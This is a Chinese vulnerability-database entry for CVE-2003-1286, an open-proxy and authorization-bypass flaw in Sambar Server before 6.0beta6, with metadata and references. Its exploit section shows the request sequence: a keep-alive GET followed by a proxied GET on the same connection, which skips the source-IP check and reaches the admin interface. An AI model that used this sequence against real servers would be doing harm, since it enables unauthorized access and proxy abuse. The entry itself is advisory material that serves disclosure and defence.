Sambar开放代理和授权绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107173 漏洞类型 其他
发布时间 2003-01-30 更新时间 2006-01-20
CVE编号 CVE-2003-1286 CNNVD-ID CNNVD-200312-422
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/24076
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-422
|漏洞详情
SambarServer6.0beta6之前版本的HTTPProxy存在漏洞。当security.ini缺少127.0.0.1proxydeny入口时,远程攻击者可以在代理请求前制作"Connection:keep-alive"请求向Sambar服务器管理员接口和外部web服务器发送HTTP代理请求。
|漏洞EXP
source: http://www.securityfocus.com/bid/10256/info

Sambar improperly validates the IP address of an originating connection and can be used to gain access the administration interface without authorization.

Once the remote attacker has gained access to the administrative interface, further attacks are possible, including privilege escalation and unauthorized system access.

-> GET / HTTP/1.1
Connection: keep-alive
*This is valid web server request. It's granted.

<- Sambar default web page

*Because the connection is keep-alive it's not broken after page is sent.

-> GET http://www.example.com HTTP/1.1

*This is valid proxy requests. This time source IP is not validated, because connection was established before

<- Web page from external site
*Sambar proxies our request.
|参考资料

来源:XF
名称:sambar-http-gain-access(16054)
链接:http://xforce.iss.net/xforce/xfdb/16054
来源:BID
名称:10256
链接:http://www.securityfocus.com/bid/10256
来源:SECTRACK
名称:1007819
链接:http://securitytracker.com/id?1007819
来源:www.sambar.com
链接:http://www.sambar.com/security.htm
来源:IDEFENSE
名称:20030925SambarServerMultipleVulnerabilities
链接:http://www.idefense.com/application/poi/display?id=103&type=vulnerabilities&flashstatus=true
来源:SECUNIA
名称:9578
链接:http://secunia.com/advisories/9578
来源:BUGTRAQ
名称:20040430SECURITY.NNOV:Sambarsecurityquest
链接:http://archives.neohapsis.com/archives/bugtraq/2004-04/0353.html